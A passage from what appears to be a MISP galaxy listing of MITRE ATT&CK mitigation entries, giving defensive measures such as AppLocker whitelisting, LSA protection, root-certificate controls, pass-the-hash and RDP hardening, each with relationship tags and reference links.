https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1004

Compile After Delivery Mitigation - T1500

This type of technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, blocking all file compilation may have unintended side effects, such as preventing legitimate OS frameworks and code development mechanisms from operating properly. Consider removing compilers if not needed, otherwise efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Identify unnecessary system utilities or potentially malicious software that may be used to decrypt, deobfuscate, decode, and compile files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Compile After Delivery Mitigation - T1500"

Table 6500. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1500

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Use Recent OS Version - M1006

New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.

The tag is: misp-galaxy:mitre-course-of-action="Use Recent OS Version - M1006"

Use Recent OS Version - M1006 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"

Table 6501. Table References

Links

https://attack.mitre.org/mitigations/M1006

System Service Discovery Mitigation - T1007

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Service Discovery Mitigation - T1007"

System Service Discovery Mitigation - T1007 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 6502. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1007

https://technet.microsoft.com/en-us/library/ee791851.aspx

Taint Shared Content Mitigation - T1080

Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).

Reduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.

Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Taint Shared Content Mitigation - T1080"

Taint Shared Content Mitigation - T1080 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 6503. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1080

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Security Support Provider Mitigation - T1101

Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code>, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: misp-galaxy:mitre-course-of-action="Security Support Provider Mitigation - T1101"

Security Support Provider Mitigation - T1101 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1101" with estimative-language:likelihood-probability="almost-certain"

Table 6504. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/mitigations/T1101

https://technet.microsoft.com/en-us/library/dn408187.aspx

Peripheral Device Discovery Mitigation - T1120

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Peripheral Device Discovery Mitigation - T1120"

Peripheral Device Discovery Mitigation - T1120 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 6505. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1120

https://technet.microsoft.com/en-us/library/ee791851.aspx

Password Policy Discovery Mitigation - T1201

Mitigating discovery of password policies is not advised since the information is required to be known by systems and users of a network. Ensure password policies are such that they mitigate brute force attacks yet will not give an adversary an information advantage because the policies are too light. Active Directory is a common way to set and enforce password policies throughout an enterprise network. (Citation: Microsoft Password Complexity)

The tag is: misp-galaxy:mitre-course-of-action="Password Policy Discovery Mitigation - T1201"

Password Policy Discovery Mitigation - T1201 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 6506. Table References

Links

https://attack.mitre.org/mitigations/T1201

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements

Install Root Certificate Mitigation - T1130

HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)

Windows Group Policy can be used to manage root certificates and the <code>Flags</code> value of <code>HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots</code> can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)

The tag is: misp-galaxy:mitre-course-of-action="Install Root Certificate Mitigation - T1130"

Install Root Certificate Mitigation - T1130 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130" with estimative-language:likelihood-probability="almost-certain"

Table 6507. Table References

Links

https://attack.mitre.org/mitigations/T1130

https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

Modify Existing Service Mitigation - T1031

Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Modify Existing Service Mitigation - T1031"

Modify Existing Service Mitigation - T1031 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031" with estimative-language:likelihood-probability="almost-certain"

Table 6508. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1031

https://github.com/mattifestation/PowerSploit

Remote File Copy Mitigation - T1105

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Remote File Copy Mitigation - T1105"

Remote File Copy Mitigation - T1105 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 6509. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1105

Graphical User Interface Mitigation - T1061

Prevent adversaries from gaining access to credentials through Credential Access that can be used to log into remote desktop sessions on systems.

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) and Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Graphical User Interface Mitigation - T1061"

Graphical User Interface Mitigation - T1061 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Graphical User Interface - T1061" with estimative-language:likelihood-probability="almost-certain"

Table 6510. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1061

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Deployment Software Mitigation - T1017

Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: misp-galaxy:mitre-course-of-action="Application Deployment Software Mitigation - T1017"

Application Deployment Software Mitigation - T1017 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"

Table 6511. Table References

Links

https://attack.mitre.org/mitigations/T1017

Credentials in Files Mitigation - T1081

Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)

The tag is: misp-galaxy:mitre-course-of-action="Credentials in Files Mitigation - T1081"

Credentials in Files Mitigation - T1081 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"

Table 6512. Table References

Links

http://support.microsoft.com/kb/2962486

https://attack.mitre.org/mitigations/T1081

Remote System Discovery Mitigation - T1018

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Remote System Discovery Mitigation - T1018"

Remote System Discovery Mitigation - T1018 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 6513. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1018

https://technet.microsoft.com/en-us/library/ee791851.aspx

Indirect Command Execution Mitigation - T1202

Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)

The tag is: misp-galaxy:mitre-course-of-action="Indirect Command Execution Mitigation - T1202"

Indirect Command Execution Mitigation - T1202 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 6514. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1202

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

https://technet.microsoft.com/en-us/library/ee791851.aspx

XSL Script Processing Mitigation - T1220

[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and/or msxsl.exe may or may not be used within a given environment. Disabling WMI may cause system instability and should be evaluated to assess the impact to a network. If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="XSL Script Processing Mitigation - T1220"

Table 6515. Table References

Links

https://attack.mitre.org/mitigations/T1220

Standard Cryptographic Protocol Mitigation - T1032

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Standard Cryptographic Protocol Mitigation - T1032"

Standard Cryptographic Protocol Mitigation - T1032 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 6516. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1032

Custom Cryptographic Protocol Mitigation - T1024

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Cryptographic Protocol Mitigation - T1024"

Custom Cryptographic Protocol Mitigation - T1024 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 6517. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1024

System Information Discovery Mitigation - T1082

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Information Discovery Mitigation - T1082"

System Information Discovery Mitigation - T1082 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 6518. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1082

https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Remote Management Mitigation - T1028

Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-course-of-action="Windows Remote Management Mitigation - T1028"

Windows Remote Management Mitigation - T1028 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028" with estimative-language:likelihood-probability="almost-certain"

Table 6519. Table References

Links

https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

https://attack.mitre.org/mitigations/T1028

Commonly Used Port Mitigation - T1043

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Commonly Used Port Mitigation - T1043"

Commonly Used Port Mitigation - T1043 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 6520. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1043

Security Software Discovery Mitigation - T1063

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Security Software Discovery Mitigation - T1063"

Security Software Discovery Mitigation - T1063 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 6521. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1063

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Network Service Scanning Mitigation - T1046

Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Service Scanning Mitigation - T1046"

Network Service Scanning Mitigation - T1046 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 6522. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1046

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Isolation and Sandboxing - M1048

Restrict execution of code to a virtual environment on or in transit to an endpoint system.

The tag is: misp-galaxy:mitre-course-of-action="Application Isolation and Sandboxing - M1048"

Table 6523. Table References

Links

https://attack.mitre.org/mitigations/M1048

Inhibit System Recovery Mitigation - T1490

Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery.

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Inhibit System Recovery Mitigation - T1490"

Table 6524. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1490

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.ready.gov/business/implementation/IT

Uncommonly Used Port Mitigation - T1065

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Uncommonly Used Port Mitigation - T1065"

Uncommonly Used Port Mitigation - T1065 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

Table 6525. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1065

Pass the Hash Mitigation - T1075

Monitor systems and domain logs for unusual credential logon activity. Prevent access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.

Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located <code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy</code> Through GPO: Computer Configuration > [Policies] > Administrative Templates > SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons. (Citation: GitHub IAD Secure Host Baseline UAC Filtering)

Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary’s ability to perform Lateral Movement between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.

The tag is: misp-galaxy:mitre-course-of-action="Pass the Hash Mitigation - T1075"

Pass the Hash Mitigation - T1075 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"

Table 6526. Table References

Links

https://attack.mitre.org/mitigations/T1075

https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml

Remote Desktop Protocol Mitigation - T1076

Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins. (Citation: Berkley Secure) Do not leave RDP accessible from the internet. Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. (Citation: Windows RDP Sessions)

The tag is: misp-galaxy:mitre-course-of-action="Remote Desktop Protocol Mitigation - T1076"

Remote Desktop Protocol Mitigation - T1076 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"

Table 6527. Table References

Links

https://attack.mitre.org/mitigations/T1076

https://security.berkeley.edu/node/94

https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx

NTFS File Attributes Mitigation - T1096

It may be difficult or inadvisable to block access to EA and ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Symantec ADS May 2009) Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA and ADSs by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)

The tag is: misp-galaxy:mitre-course-of-action="NTFS File Attributes Mitigation - T1096"

NTFS File Attributes Mitigation - T1096 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096" with estimative-language:likelihood-probability="almost-certain"

Table 6528. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1096

https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Permission Groups Discovery Mitigation - T1069

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Permission Groups Discovery Mitigation - T1069"

Permission Groups Discovery Mitigation - T1069 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

Table 6529. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1069

https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Admin Shares Mitigation - T1077

Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.

Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Windows Admin Shares Mitigation - T1077"

Windows Admin Shares Mitigation - T1077 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 6530. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

